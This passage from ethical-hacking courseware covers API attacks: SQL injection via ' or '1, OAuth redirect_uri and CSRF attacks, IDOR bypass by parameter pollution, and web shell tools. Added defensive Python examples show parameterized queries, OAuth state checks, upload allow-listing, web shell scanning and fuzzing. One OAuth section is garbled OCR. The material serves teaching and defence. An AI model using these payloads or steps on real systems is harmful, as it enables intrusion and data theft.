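          "from a", len(BILLION_LAUGHS), "byte document")
    try:
        safe_parse(BILLION_LAUGHS)
    except ValueError as exc:
        print("rejected:", exc)
```

Rejecting every DTD is the pragmatic web-service rule: SOAP 1.1 already forbids a DTD in a SOAP message, so there is no legitimate request to lose.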
▪ Injection Attacks: Similar to traditional web applications, APIs are also vulnerable to various injection attacks. For example, consider the following normal URL:

http://billpay.com/api/v1/cust/459

For the abovementioned URL, the API retrieves the details of the customer with ID 459 from the database using the following SQL query:

"SELECT * FROM Customers WHERE custID='" + custID + "'"

Here, custID is replaced with 459:

SELECT * FROM Customers WHERE custID='459'

Now assume that an attacker injects the malicious input ' or '1 into the abovementioned URL:

http://billpay.com/api/v1/cust/'%20or%20'1

The resultant malicious SQL query is

SELECT * FROM Customers WHERE custID='' or '1'

The abovementioned query returns the details of all the customers in the database, because the injected string closes the quoted value and appends a condition that is always true. Using this information, an attacker may further delete or modify the data in the database or use the customers' information to perform other malicious activities on the database.
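The billpay.com injection above reproduced against an in-memory SQLite table, as an added example (not code from the CEH courseware), next to the parameterized query that stops it. The Customers rows are constructed for this example, and the column names other than custID are assumptions.

```python
"""Added example (not from the CEH courseware): the custID injection from the
text against SQLite, vulnerable concatenation beside a bound parameter.
The table contents and extra columns are constructed assumptions."""
import sqlite3
from urllib.parse import unquote


def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Customers (custID TEXT PRIMARY KEY, name TEXT, card TEXT)")
    db.executemany("INSERT INTO Customers VALUES (?, ?, ?)", [
        ("459", "rinni", "4111-1111-1111-1111"),   # constructed sample data
        ("460", "alice", "4222-2222-2222-2222"),
        ("461", "bob", "4333-3333-3333-3333"),
    ])
    return db


def cust_id_from_path(url):
    """Last path segment of /api/v1/cust/<id>, percent-decoded as the server would."""
    return unquote(url.rsplit("/", 1)[-1])


def lookup_vulnerable(db, cust_id):
    """String concatenation exactly as in the text: the input becomes SQL.
    With ' or '1 the WHERE clause reads custID='' or '1', true for every row."""
    sql = "SELECT * FROM Customers WHERE custID='" + cust_id + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, cust_id):
    """The input is bound as a value; the engine never treats it as SQL."""
    return db.execute("SELECT * FROM Customers WHERE custID=?", (cust_id,)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    evil = cust_id_from_path("http://billpay.com/api/v1/cust/'%20or%20'1")
    print("vulnerable:", len(lookup_vulnerable(db, evil)), "rows")
    print("parameterized:", len(lookup_parameterized(db, evil)), "rows")
```

The fix is the bound parameter, not input filtering: the same ' or '1 string reaches the parameterized query unchanged and simply matches no customer.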
▪ Exploiting Insecure Configurations: Insecurely configured API access may allow attackers to perform an MITM attack. An attacker may sniff the traffic between an API and a client, manipulate the client-side certificate, and start monitoring or manipulating the encrypted traffic between the client and the API.
▪ Insecure Direct Object References (IDOR): In general, direct object references are used as arguments for API calls, and access rights are not imposed on the objects. Such references can be identified from the API metadata and exploited.
▪ Login/Credential Stuffing Attacks: Attackers employ login attacks or credential stuffing attacks to exploit password reuse across sites. Credential stuffing attacks do not perform password guessing or brute-forcing; instead, they automate the entry of stolen pairs of credentials using automated tools such as Sentry MBA and SNIPR to break into an account.

Figure 14.90: Illustration of credential stuffing attack (a collection of stolen credentials replayed against web services)
▪ API DDoS Attacks: A DDoS attack involves saturating an API with a massive volume of traffic from multiple infected computers (a botnet) to delay the API services to legitimate users. Although many rate-limit constraints are implemented to protect the server against crashing, they may not prevent the service delay (slow API responses), thereby degrading the API's user experience.

Attackers often carry out these attacks using botnets that are built to discover and stay within the API rate-limit controls to increase the likelihood of a successful attack. Mixed in with the regular traffic from legitimate users, attackers' requests can also bypass API security management systems, load balancers, and other security implementations.

Most of these attacks may not be volumetric; they may also exploit certain API vulnerabilities to disrupt the API services. For instance, an attacker who gains access to the memory reserved for the API can consume CPU and other resources of the API to delay the service for as long as possible.

Figure 14.91: Illustration of API DDoS attack
‘Authorization
Attackso n API:OAuthAttacks
According to https://auth0.com,
OAuthis an authorizationprotocolthat allowsa user to
resources on one site to anothersite without having
grantlimitedaccess to his/her to
expose
his/her
credentials. devicesand applications,
Auth grantsauthorizationflowsfor many computing suchas
applications
users to different
connecting fromone application
to accessthe required
information.
Differentactors involvedi n the OAuthprocess:
> Ownerof the resource: The resource owner is alsoknownas a user who grants
permission to accesshis/her
to an application
suchas providing
is limitedor conditional, account.
access
The to the application
onlyreadandwrite permissions.
Server(API):
‘Authorization/Resource Theresource server provides
the secureduser
andthe authorizationserver validatesthe user identity
account, andthen supplies
the accesstokento theapplication.
Clientor Application: that seeksaccessto the user account. To
It is an application
the user must authorizethe application;
access the account, then,the AP!should
validatetheauthorization.
Steps involved in Authorization Code Grant

There are four steps involved in the authorization code grant, through which attackers can perform various authorization attacks on the API.

* The user passes the GET request to the client via the user agent to initiate the authorization process. This operation can be performed via the "Login with" or "Connect" button displayed on the client's site.
* The user agent can be redirected to the authorization server by the client using the following parameters:
    * response_type: Code used for informing the server which permissions to execute
    * client_id: ID assigned to the client
    * redirect_uri: URI where the authorization server redirects the user agent when the authorization code is provided
    * scope: Defines the level of access to the application
    * state: Opaque value used for security implementations. The value is also used for maintaining the state between request and callback
* When the user is authenticated and authorized to access the resource, the user agent is redirected to redirect_uri by the authorization server. The server uses the following parameters to do this:
    * code: Authorization code
    * state: Value supplied in the abovementioned request
* Using the authorization code, the client requests the access token by adding the following parameters in the body of a request:
    * grant_type: authorization_code
The attacker creates a malicious webpage as follows:

* Uses CSRF to make the user log out on the provider.
* Again uses CSRF to make the user log in on the provider using his/her fake account credentials.
* Spoofs the first request to connect the provider account with the client. It is just another GET request. It is usually performed inside the <iframe> tag to make the user unaware of this action.

Once the victim opens the attacker's malicious page, his/her account gets logged out on the provider and connects as a fake account. Then, the attacker's fake account is connected with the victim's account on the client. The victim does not ask the client for permission, as the attacker has already approved it. Hence, the attacker can log in to the victim's account on the client side using his/her fake account on the provider.
Attack on 'redirect_uri'

While registering, the domain is usually specified by the client, and only those "redirect_uri" values on the specific domain are permitted. If an attacker can identify vulnerabilities such as XSS on a web page on the client domain, he/she can exploit them to capture the authorization code.

Steps to perform an attack on 'redirect_uri':

* The attacker leaks data through a vulnerable page on the client domain: https://xyz.com/vuln
* The attacker installs malicious JavaScript on the page; then, the page sends the URL, which is loaded in the browser (along with the parameter fragments), to the attacker.
* The attacker creates a page that prompts the user to open a malicious link: https://provider.com/oauth/authorize?client_id=CLIENTID&response_type=auth_code&redirect_uri=https%3A%2F%2Fxyz.com%2Fvuln
* When the victim opens the malicious link, the user agent is redirected to https://xyz.com/vuln?code=CODE, and the CODE is then exfiltrated to the attacker.
* Now, the attacker uses the retrieved code to provide the access token via an authentic 'redirect_uri' such as https://xyz.com/oauth/callback?code=CODE
CSRF on Authorization Response

The attacker performs a CSRF attack to connect a fake account on the provider with the victim's account on the client side. This attack exploits the third request related to the authorization code grant.

Steps to perform CSRF on authorization response:

Now, the attacker can sign in as the victim on the client by logging in with his/her fake account on the provider.
Access Token Reusage

OAuth requires unique access tokens for individual clients. It ensures that these tokens saved on the authorization server are mapped to relevant scopes and time expiry. Access tokens provided for "Client A" can work for "Client B". Attackers exploit this feature to perform attacks on clients that allow grants implicitly.

Steps to reuse access tokens:

* The attacker develops a legitimate client application "client A" and enrolls it with some provider.
* Now, the attacker lures the victim into accessing "client A" and gains illegal access to the victim's access token on "client A".
* The attacker is verified as a valid entity by "client B". Therefore, one access token is sufficient for use on many clients using the implicit grant.
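The client-side checks that close the three OAuth weaknesses discussed above (an unregistered redirect_uri, a forged authorization response, and a token issued to another client), as an added Python example that is not part of the courseware. The endpoint and host names are the page's placeholders; the function names, the session dictionary and the introspection result shape are assumptions for illustration.

```python
"""Defensive checks for the OAuth 2.0 authorization-code flow.

Added example, not from the CEH courseware. REGISTERED_REDIRECTS,
build_authorize_url, handle_callback and token_accepted_by_resource_server
are illustrative names; the URLs reuse the page's placeholders.
"""
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlparse

AUTHORIZE_ENDPOINT = "https://provider.com/oauth/authorize"
CLIENT_ID = "CLIENTID"
# Exact-match allow-list of redirect URIs registered with the provider.
# Registering a whole domain is what lets an XSS page such as
# https://xyz.com/vuln receive the code in the redirect_uri attack above.
REGISTERED_REDIRECTS = {"https://xyz.com/oauth/callback"}


def redirect_uri_allowed(uri: str) -> bool:
    """Accept only an exact, pre-registered https redirect_uri, never a domain match."""
    parsed = urlparse(uri)
    if parsed.scheme != "https" or parsed.fragment:
        return False
    return uri in REGISTERED_REDIRECTS


def build_authorize_url(session: dict, redirect_uri: str, scope: str) -> str:
    """Step 2 of the grant: redirect the user agent with a fresh, unguessable state.

    The state is stored in the user's session so that the callback can prove the
    response belongs to a request this browser actually started.
    """
    if not redirect_uri_allowed(redirect_uri):
        raise ValueError("redirect_uri is not registered: %s" % redirect_uri)
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    session["oauth_redirect_uri"] = redirect_uri
    params = {
        "response_type": "code",
        "client_id": CLIENT_ID,
        "redirect_uri": redirect_uri,
        "scope": scope,
        "state": state,
    }
    return AUTHORIZE_ENDPOINT + "?" + urlencode(params)


def handle_callback(session: dict, callback_url: str) -> str:
    """Step 3: validate the redirect back to the client and return the code.

    A missing or mismatched state is rejected, which stops the CSRF on the
    authorization response: an attacker cannot plant his own code into the
    victim's session because he cannot know the state that session holds.
    The state is consumed on first use so the callback cannot be replayed.
    """
    expected_state = session.pop("oauth_state", None)
    if expected_state is None:
        raise PermissionError("no OAuth request in progress for this session")
    query = parse_qs(urlparse(callback_url).query)
    state = query.get("state", [""])[0]
    if not hmac.compare_digest(state.encode(), expected_state.encode()):
        raise PermissionError("state mismatch: possible CSRF")
    code = query.get("code", [""])[0]
    if not code:
        raise ValueError("authorization code missing")
    return code


def token_accepted_by_resource_server(token_info: dict, expected_client: str) -> bool:
    """Token-reuse check: a token issued to another client must not be honoured.

    token_info stands for a token introspection result (RFC 7662), which carries
    the client_id the token was issued to and whether the token is still active.
    A token that works for "Client A" is therefore refused by "Client B".
    """
    return bool(token_info.get("active")) and token_info.get("client_id") == expected_client
```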
Other Techniques to Hack an API

Different ways to hack an API are discussed below:
Reverse Engineering

Viewing the APIs from the developer's viewpoint can be flawed because it checks only if an API is working as intended. Once it is deployed for the end-user experience, it may not work as it worked in the developer environment. This is what attackers often attempt to do while reverse-engineering the API. Attackers invoke APIs in reverse order to identify the flaws residing in the API that can be obfuscated in real-time usage.

For instance, consider an order flow in which an order is made using the same account that is already used for an earlier booking. The order appears to be something like this:

* Order made
* Order linked with the account
* Order is accepted

Attackers can use this flow in the process of reverse engineering an API. If the accepting mechanism is carried out in the reverse order, the internal API used to connect orders to accounts can be crashed, thereby forcing the browser to expose the account details of a user.
User Spoofing

It is a process of concealing the original identity and masquerading as some other valid entity. In most cases, the attacker tries to expose himself as a legitimate user with special privileges and provides free data access to additional users to cause more damage. Attackers use details obtained from phishing or any other information-leaking methods to masquerade as the original user.

Social Engineering

Although it may not be a direct API attack, social engineering can be performed through the API. Social engineering does not affect the API or the machine code; it is a technique employed to trick users into divulging their credentials or other sensitive information. Phishing is a technique often used to send malicious links to users via email to reset or validate their security credentials. Spear-phishing is another sophisticated social engineering attack in which additional data is provided to the users, making them believe that they are interacting with a valid endpoint.
REST API Vulnerability Scanning
REST API vulnerabilities introduce the same risks as security issues in web applications and websites. These risks include critical data theft, intermediate data tampering, etc. Performing thorough API vulnerability scanning on REST APIs can expose various underlying vulnerabilities that attackers can exploit. Attackers can use tools such as Astra, Fuzzapi, W3af, and Appspider to carry out REST API vulnerability scanning.

* Astra

Source: https://github.com

Attackers use the Astra tool to detect and exploit underlying vulnerabilities in a REST API. Astra can discover and test authentications such as login and logout; this feature makes it easy for attackers to incorporate it into the CI/CD pipeline. Astra can invoke an API collection as an input value; hence, it can also be used for scanning REST APIs. Astra allows attackers to detect REST APIs that are vulnerable to attacks such as XSS, SQL injection, information leakage, CSRF, broken authentication and session management, JWT attack, blind XXE injection, CRLF detection, CORS misconfiguration, and rate limiting.
Figure 14.92: Screenshot of Astra

Some REST API vulnerability scanning tools are as follows:

* Fuzzapi (https://github.com)
* w3af (http://docs.w3af.org)
* Appspider (https://www.rapid7.com)
* Vooki (https://www.vegabird.com)
* OWASP ZAP (https://www.owasp.org)
Bypassing IDOR via Parameter Pollution

Insecure direct object reference (IDOR) is a vulnerability that arises when developers disclose references to internal implementation objects such as database keys, directories, files, and other data. An attacker can exploit these references to modify them and gain unauthorized access to data. For example, consider this normal request:

api.xyz.com/profile/user_id=321

Attackers send this request repeatedly with unique values.
For instance, assume that the victim's user_id is 321. Attackers can change this user_id value to 654 (it is another user_id value) to identify IDOR. If the page is not vulnerable to IDOR, it generates a "401 Unauthorized" error message.

To bypass IDOR via parameter pollution, the attacker sends two user_id parameters in a request, in which one parameter is appended with the victim's user_id and the other one is appended with the attacker's own user_id. For example, consider the following request:

api.xyz.com/profile/user_id=321

The attacker manipulates the abovementioned request using parameter pollution to bypass IDOR:

api.xyz.com/profile/user_id=654&user_id=321

When the abovementioned request is processed at the REST API endpoint, the application verifies the first user_id parameter and ensures that the user who is sending the request has included his/her own user_id in the GET request. Hence, an attacker can bypass IDOR by providing two user_id parameters: one belongs to the victim and the other belongs to the attacker. The application is tricked into considering it as a valid request.

Attackers use tools such as Burp Suite to proxy the traffic and intercept all the traffic to REST API endpoints. Then, they use the parameter pollution technique to send both the attacker's user_id and the victim's user_id in the GET request to gain unauthorized access and retrieve sensitive data from the victim's account. Using this technique, attackers can also compromise the application's functionality because every parameter inside the application is vulnerable to this attack.

Figure 14.93: Screenshot of Burp Suite
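The flawed endpoint logic described above next to a hardened version, plus a log-review check for repeated parameters, as an added Python example that is not from the courseware. The session table, profile records, URL shape and function names are constructed for illustration.

```python
"""Parameter pollution against an IDOR check: vulnerable and hardened lookups.

Added example, not from the CEH courseware. SESSIONS, PROFILES and the
function names are constructed; the user_id values are the page's (321, 654).
"""
from urllib.parse import parse_qs, urlparse

# Constructed sample data: which user_id each session token really belongs
# to, and the profile records the API serves.
SESSIONS = {"session-attacker": 654}
PROFILES = {
    321: {"name": "victim", "email": "victim@example.test"},
    654: {"name": "attacker", "email": "attacker@example.test"},
}


class Forbidden(Exception):
    """Stands in for the 401/403 the API would return."""


def vulnerable_profile_lookup(session_token: str, url: str) -> dict:
    """Mirrors the flaw in the text: the authorization check reads the FIRST
    user_id but the data layer reads the LAST one, so
    ?user_id=654&user_id=321 passes the check as 654 and returns 321's data.
    """
    ids = parse_qs(urlparse(url).query).get("user_id", [])
    caller = SESSIONS.get(session_token)
    if not ids or int(ids[0]) != caller:      # check uses the first value
        raise Forbidden("user_id does not match session")
    return PROFILES[int(ids[-1])]             # lookup uses the last value


def hardened_profile_lookup(session_token: str, url: str) -> dict:
    """Two fixes: reject a repeated parameter outright, and take the object key
    from the authenticated session rather than from client-supplied input.
    """
    ids = parse_qs(urlparse(url).query).get("user_id", [])
    if len(ids) != 1:
        raise Forbidden("user_id must appear exactly once")
    caller = SESSIONS.get(session_token)
    if caller is None or int(ids[0]) != caller:
        raise Forbidden("user_id does not match session")
    return PROFILES[caller]                   # key comes from the session


def duplicated_params(url: str) -> list:
    """Log-review helper: names of query parameters that repeat in a request,
    a cheap signal for parameter-pollution attempts in access logs.
    """
    params = parse_qs(urlparse(url).query)
    return sorted(name for name, values in params.items() if len(values) > 1)
```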
Web Shells

A web shell is a malicious piece of code or script that is developed using server-side languages such as PHP, ASP, PERL, RUBY, and Python, and then installed on a target server. The malicious script enables attackers to gain remote access or remote administration capabilities over the target server along with its file system.

Attackers inject malicious scripts by exploiting the most common vulnerabilities such as remote file inclusion (RFI), local file inclusion (LFI), exposition of administration interfaces, and SQL injection. Attackers can also perform XSS attacks using social engineering techniques to install the malicious code.

Attackers also employ network monitoring tools (mainly Wireshark) to discover vulnerabilities that can be exploited later for web shell injection. These vulnerabilities often lie in a web server's software or content management system (CMS).

Web shells are used by the attacker to carry out privilege escalation and gain remote access to download, upload, erase, and execute files on the target web server. Using the web shell, attackers can also steal private data, damage the website's reputation via DDoS attacks, change the structure of the website, make the web page's resources unavailable on the Internet, maintain persistence, exfiltrate data, etc.

Figure 14.94: Illustration of a web shell
Web Shell Tools

Figure 14.95: Screenshot of WSO PHP Webshell

Some additional web shell tools are as follows:

* b374k (https://github.com)
* C99 (https://github.com)
* China Chopper (https://www.fireeye.com)
* R57 (https://github.com)
* Pouya ASP WebShell (https://github.com)
Gaining Backdoor Access via Web Shell

* Weevely

Source: https://github.com

Attackers use Weevely to develop a backdoor shell and upload it to a target server to gain remote shell access. This tool also helps attackers in performing administrative tasks, maintaining persistence, and spreading backdoors across the target network.

Figure 14.96: Screenshot of Weevely
How to Prevent Installation of a Web Shell

* Perform regular vulnerability scans to detect the areas of threats using any web security software
* Deploy firewalls on the web server to monitor and control the network traffic based on the security rules
* Deactivate directory browsing in the web server to prevent directory traversal attacks
* Regularly audit the accounts and review the group permissions to prevent the installation of a web shell from the web server to the internal network
* Disable all unused and risky PHP functions such as exec(), shell_exec(), show_source(), proc_open(), passthru(), and pcntl_exec()
* Use escapeshellarg() and escapeshellcmd() to ensure that the user inputs are not injected into the shell commands, to avoid command execution vulnerabilities
* Ensure that all the web applications using upload forms are secure and permit only the whitelisted file types
* Avoid using code from untrusted websites or online forums
* Do not install unnecessary third-party plugins, and regularly check and update the plugins used
Web Shell Detection Tools

Attackers often try to discover vulnerabilities in an application or web page, through which they target the web servers. Then, they exploit those vulnerabilities to install backdoors via web shells to gain remote access and perform malicious operations on the target server. To prevent such attacks, it is mandatory to carry out regular web shell or backdoor scanning. Security professionals use tools such as Web Shell Detector, FireEye Network Security, and NeoPI to detect these web shells on the target servers.

* Web Shell Detector

Source: https://www.shelldetector.com

Web Shell Detector is a PHP/Python-based script that helps in scanning and discovering php/cgi(perl)/asp/aspx shells. It has a "web shells signature database" that helps in discovering the web shell.
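Two of the countermeasures from the previous section (allow-listing upload file types, watching for the risky PHP functions) together with the kind of web shell scan this section describes, as an added Python example that is not from the courseware or from Web Shell Detector. The allow-list, function names and sample PHP snippets are constructed; the risky PHP function list is the page's, extended with system() and eval().

```python
"""Upload allow-listing and a simple web-shell indicator scan.

Added example, not from the CEH courseware or Web Shell Detector. The
ALLOWED_UPLOADS table, upload_allowed and webshell_indicators are
illustrative; the PHP function names come from the countermeasures above
plus system() and eval().
"""
import re

# Only these extensions may be uploaded, and the content must carry the
# matching file signature (magic bytes).
ALLOWED_UPLOADS = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "pdf": b"%PDF-",
}

# Functions the countermeasures say to disable; a call to one of them in an
# uploaded or unexpected .php file deserves a look.
RISKY_PHP_FUNCTIONS = ("exec", "shell_exec", "show_source", "proc_open",
                       "passthru", "pcntl_exec", "system", "eval")
# Request data flowing into one of those calls is the classic web-shell shape.
REQUEST_INPUTS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE", "$_FILES")

_RISKY_CALL = re.compile(r"\b(" + "|".join(RISKY_PHP_FUNCTIONS) + r")\s*\(", re.I)


def upload_allowed(filename: str, content: bytes) -> bool:
    """Allow-list by the FULL extension chain and by magic bytes.

    'shell.php.jpg' is rejected because every suffix after the first dot is
    checked, not only the last; a .jpg whose bytes are not JPEG is rejected
    too, so a PHP file renamed to .jpg does not get through either.
    """
    parts = filename.lower().split(".")
    if len(parts) < 2 or "" in parts:
        return False
    suffixes = parts[1:]
    if any(s not in ALLOWED_UPLOADS for s in suffixes):
        return False
    return content.startswith(ALLOWED_UPLOADS[suffixes[-1]])


def webshell_indicators(php_source: str) -> dict:
    """Return the risky functions called and whether request data feeds them.

    'suspicious' is True when a risky call and a request superglobal appear
    on the same line, e.g. shell_exec($_GET['cmd']).
    """
    calls = sorted({m.group(1).lower() for m in _RISKY_CALL.finditer(php_source)})
    suspicious = any(
        _RISKY_CALL.search(line) and any(src in line for src in REQUEST_INPUTS)
        for line in php_source.splitlines()
    )
    return {"risky_calls": calls, "suspicious": suspicious}
```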
Web Shell Detector v1.62

Some web shell detection tools are listed below:

* FireEye Network Security (https://www.fireeye.com)
* NeoPI (https://github.com)
* AntiShell Web Shell Hunter (http://antishell.com)
* Astra (https://www.getastra.com)
Secure API Architecture

API is a popular technology that acts as a gateway for communication and integrates different applications using the web. API is widely employed due to its advanced techniques and its use of the prevailing infrastructure. It is vulnerable to the latest and most sophisticated cyber-attacks due to various security flaws induced by poor programming practices and also due to its transparency. To safeguard API from these attacks, security professionals and developers need to establish a secure API architecture, effective security strategies, and mitigation policies.

API architecture is built using an API gateway consisting of firewalls that work as a server to control the traffic and detect all possible attacks. Executing the security policy for the API security architecture is achieved by isolating the API implementation and API security into different layers. These layers emphasize that the API design and API security perform different roles that require a different field of expertise. It focuses on the logical separation of concerns, where one emphasizes the knowledge of solving the right problem at the right time. Under a secure API architecture, the API developer focuses on the API security capabilities and controls to admin, such as access control, threat detection, confidentiality, integrity, authentication, audit management, message validation, and rate limiting of all the APIs published by the organization.

Figure: Secure API architecture (enterprise network, devices, integrations, cloud, mobile, API clients, API driven)
API Security Risks and Solutions

Broken Object Level Authorization
  * Scrutinize the implementation of the authorization policies
  * Implement a robust access control policy for random and unpredictable object ID values

Excessive Data Exposure
  * Scrutinize the data flow from the endpoint to the client

Lack of Resources and Rate Limiting
  * Ensure appropriate rate-limiting controls are in place
  * Use OWASP Automated Threat Handbook as a knowledge source for preventing bots from consuming your resources

Broken Function Level Authorization
  * Avoid function-level authorization
  * Use simple and standard authorization and enable the default setting to deny

Mass Assignment
  * Do not expose the internal variable or object names as inputs
  * Ensure whitelisting of all the properties that the client can update

Security Misconfiguration
  * Perform hardening process against API continuously
  * Use scanning tools and human reviews to examine the entire API stack for security misconfigurations

Injection
  * Perform input validation and whitelisting
  * Implement a parameterized interface for processing inbound API requests
  * Ensure that the filtering logic limits the number of records returned

Improper Assets Management
  * Maintain proper inventory of all API environments including production, staging, testing, and development
  * Conduct security review of all APIs, mainly focusing on standardizing functions
  * Create a risk level ranking of the APIs and improve the security for APIs having a higher risk level

Insufficient Logging and Monitoring
  * Use standard response format for all the APIs that support incident logging activities
  * Regularly monitor all the API endpoints in all phases of production, staging, testing, and development

Table 165: OWASP Top 10 API Security Risks and Solutions
Best Practices for API Security

* Use an optimized firewall to ensure that all the unused, unnecessary files and permissive rules are revoked
* Use IP whitelisting to create a list of trusted IP addresses or IP ranges to access APIs and to limit the access to only trusted users or components for a particular time frame
* Maintain and monitor access logs regularly to help in detecting anomalies and to take precautionary measures in the future
* Implement a pagination technique that can divide a single response into several fragments so that the payloads are not oversized
* Use parameterized statements in SQL queries to prevent inputs that include entire SQL statements
* Perform input validation on the server side instead of the client side to prevent bypassing attacks
* Conduct regular security assessments to secure all the API endpoints using automated tools
* Regularly monitor and perform continuous auditing of the API and analyze the workflows to prevent any attacks
* Use tokens to establish trusted identities and to control access to services and resources
* Use signatures to ensure that only authorized users can decrypt or modify the data
* Employ packet sniffers to track events related to information disclosure and to detect insecure API calls
* Use techniques such as quotas and throttling to control and track the API usage and to set the API request limit
* Implement API gateways to authenticate the traffic and to control and analyze the usage of APIs
* Implement advanced techniques to prevent sophisticated human-like bots from accessing the APIs
* Implement multifactor authentication and use authentication protocols such as AppToken, OAuth2, and OpenID Connect to authenticate the users and applications in the API
* Document audit logs before and after every security event, and make sure to sanitize the log data to prevent log injection attacks
Best Practices for Securing Webhooks
Web Application Security

After learning the hacking methodologies adopted by attackers of web applications and the tools they use, it is important to learn how to secure these applications from such attacks. A careful analysis of security will help you, as an ethical hacker, to secure your applications. To do so, one should design, develop, and configure web applications using the countermeasures and techniques discussed in this section.
Web Application Security Testing
Web application security testing is a process of conducting security assessment and performance analysis of an application and generating timely reports on its security levels and threat exposures. It is often conducted by security professionals and programmers to test and strengthen the security of an application using the following techniques:

* Manual Web Application Security Testing

Manual security testing involves testing a web application using manually designed data, customized code, and some browser extension tools such as SecApps to detect vulnerabilities and weaknesses associated with the applications. It mainly focuses on business logic errors and threat analysis. Security professionals also use other tools such as Selenium, JMeter, LoadRunner, QTP, Bugzilla, and TestLink to perform manual testing.

* Automated Web Application Security Testing

It is a technique employed for automating the testing process. Automated testing tools can be used for the rapid discovery of vulnerabilities in a systematic manner so that they can be patched easily. These testing methods and procedures are incorporated into each development stage to report feedback constantly. Changes in every piece of code can be analyzed, and developers are instantly notified if any vulnerabilities are detected. Security professionals use tools such as Ranorex Studio, TestComplete, LEAPWORK, Katalon Studio, and Testsigma to carry out automated testing.

* Static Application Security Testing (SAST)

Static application testing is also referred to as white box testing, in which the complete system architecture (including its source code) or application/software to be tested is
Web Application Fuzz Testing

Web application fuzz testing (fuzzing) is a black box testing method. It is a quality checking and assurance technique used to identify coding errors and security loopholes in web applications. Massive amounts of random data called "fuzz" are generated by fuzz testing tools (fuzzers) and used against the target web application to discover vulnerabilities that can be exploited by various attacks. Attackers employ various attack techniques to crash the victim's web application and cause havoc in the least possible time. Security personnel and web developers employ this fuzz testing technique to test the robustness and immunity of the developed web applications against attacks such as buffer overflow, DoS, XSS, and SQL injection.

Steps of Fuzz Testing

Web application fuzz testing involves the following steps:

* Identify the target system
* Identify inputs
* Generate fuzzed data
* Execute the test using fuzz data
* Monitor system behavior
* Log defects

Fuzz Testing Strategies

* Mutation-Based: In this type of testing, the current data samples create new test data, and the new test data will again mutate to generate further random data. This type of testing starts with a valid sample and keeps mutating until the target is reached.
* Generation-Based: In this type of testing, the new data will be generated from scratch, and the amount of data to be generated is predefined based on the testing model.
* Protocol-Based: In this type of testing, the protocol fuzzer sends forged packets to the target application that is to be tested. This type of testing requires detailed knowledge of the protocol format being tested. It involves writing a list of specifications into the fuzzer tool and then performing the model-based test generation technique to go through all the listed specifications and add the irregularities in the data contents, sequence, etc.

Fuzz Testing Scenario

The diagram below shows an overview of the main components of the fuzzer. An attacker script is fed to the fuzzer, which in turn translates the attacks to the target as HTTP requests. These will get responses from the target, and all the requests and their responses are then logged for manual inspection.

Figure 14.99: Web application fuzz testing scenario

Fuzz Testing Tools:

* WSFuzzer (https://www.owasp.org)
* WebScarab (https://www.owasp.org)
* Burp Suite (https://portswigger.net)
* HCL AppScan Standard (https://www.hcltech.com)
* Peach Fuzzer (https://www.peach.tech)
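The six fuzz-testing steps and the mutation-based strategy above carried out in Python, as an added example that is not from the courseware or from any of the tools listed. The target handler, its validation bug, the seed request and the mutation strategies are constructed for illustration; a real run would send the requests over HTTP instead of calling a function in-process.

```python
"""A small mutation-based fuzzer for HTTP query parameters.

Added example, not from the CEH courseware. target_handler (and its bug),
SEED_QUERY and the mutation strategies are constructed for illustration.
"""
import random
from urllib.parse import parse_qsl, urlencode

SEED_QUERY = "item=book&qty=2&coupon=SAVE10"   # valid sample request (constructed)


class BadRequest(Exception):
    """The handler noticed the input was wrong and rejected it (HTTP 400)."""


def target_handler(query: str) -> int:
    """Constructed target with a robustness bug: qty is converted without
    being validated, so a non-numeric qty escapes as an unhandled exception
    (the equivalent of a 500 / crash) instead of a BadRequest.
    """
    params = dict(parse_qsl(query, keep_blank_values=True))
    if "item" not in params or "qty" not in params:
        raise BadRequest()
    qty = int(params["qty"])             # BUG: no validation before conversion
    if qty <= 0:
        raise BadRequest()
    coupon = params.get("coupon", "")
    if coupon and not coupon.isalnum():
        raise BadRequest()
    return 200


def mutate(value: str, rng: random.Random) -> str:
    """Mutation-based fuzzing: derive a new test value from a valid one."""
    strategies = [
        lambda v: v + rng.choice(["'", '"', "<", ">", "%00", "\\", ";", "--"]),
        lambda v: v * rng.randint(2, 50),                           # length extension
        lambda v: v[:-1],                                           # truncation / empty
        lambda v: (chr(rng.randint(33, 126)) + v[1:]) if v else "?",  # byte substitution
        lambda v: str(rng.randint(-2 ** 31, 2 ** 31)),               # numeric edge cases
    ]
    return rng.choice(strategies)(value)


def fuzz(seed_query: str, iterations: int, seed: int = 1) -> list:
    """Run the fuzz loop against target_handler and return the logged defects.

    A BadRequest means the handler rejected the input correctly and is not a
    defect; any other exception means the input was never validated. The
    fixed seed keeps a run reproducible so a defect can be replayed.
    """
    rng = random.Random(seed)
    base = parse_qsl(seed_query, keep_blank_values=True)   # identify inputs
    defects = []
    for _ in range(iterations):
        mutated = list(base)
        idx = rng.randrange(len(mutated))
        name, value = mutated[idx]
        mutated[idx] = (name, mutate(value, rng))          # generate fuzzed data
        query = urlencode(mutated)
        try:
            target_handler(query)                          # execute the test
        except BadRequest:
            continue                                       # monitored: expected
        except Exception as exc:                           # monitored: crash
            defects.append({"query": query, "error": type(exc).__name__})  # log
    return defects
```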
Source Code Review

Source code reviews are used to detect bugs and irregularities in the developed web applications. They can be performed manually or using automated tools to identify specific areas in the application code that handle functions regarding authentication, session management, and data validation. They can identify un-validated data vulnerabilities and poor coding techniques of developers that allow attackers to exploit the web applications.

Figure: Manual code review vs. automated code review
Encoding Schemes

Encoding is the process of converting source information into its equivalent symbolic form, which helps in hiding the meaning of the data. At the receiving end, the encoded data is decoded into the plaintext format. Decoding is the reverse process of encoding. Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the intended manner.
Types of Encoding Schemes

* URL Encoding

Web browsers/web servers permit URLs to contain only printable characters of ASCII code that can be understood by them for addressing. URL encoding is the process of converting a URL into a valid ASCII format so that data can be safely transported over HTTP. Several characters in this range have special meanings when they are mentioned in the URL scheme or HTTP protocol. Thus, these characters are restricted. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in the hexadecimal format.

* HTML Encoding

